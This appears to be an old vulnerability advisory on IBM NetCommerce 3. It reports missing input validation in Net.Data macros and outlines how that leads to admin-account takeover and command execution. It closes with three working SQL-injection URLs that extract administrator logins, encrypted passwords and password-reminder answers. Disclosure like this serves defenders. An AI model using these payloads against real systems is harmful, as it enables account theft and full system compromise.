while i was participating on the openhack contest
i found a couple of serious security-holes within ibm s
so called "netcommerce" thing which seems to be a mixture of
websphere, net.data, servlets, jsp s and db2?

however..summary:

class: input validation error
remote: yes
local: yes
vulnerable: ibm netcommerce 3*


description:


besides well known websphere-bugs (file thru disclosure and default-admin
passwords) ...

the most dangerous bugs result from NON-existing input validation within
netcommerc s net.data "macros".

by crafting malformed http-requests it is possible to extract "any"
netcommerce-database-information.

combining this method with other default-"netcommerce" funcionality
(PasswordReset for example) it is possible to take hold of so called
"store-" or "site-manager"-accounts.

once youre an nc-administrator you are allowed to use all the admin-tools.

at this point youre able to up- and download files, issue op-system-commands
or do any query with the very very high-privileged DB2INST1 account.

this can lead to a possible take-over of the whole system....


many "default-macros" are vulnerable to this (classic:-) sort of attack.

exploit:


a few examples:

1) "HowTo find Administrator Accounts"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

2) "Passwords(crypted)"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

3) "Password-Reminders"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
example. casting between different data-types is possible (read the db2-man
pages).

also it should(not proofed) be possible to query other databases.

RC-EOF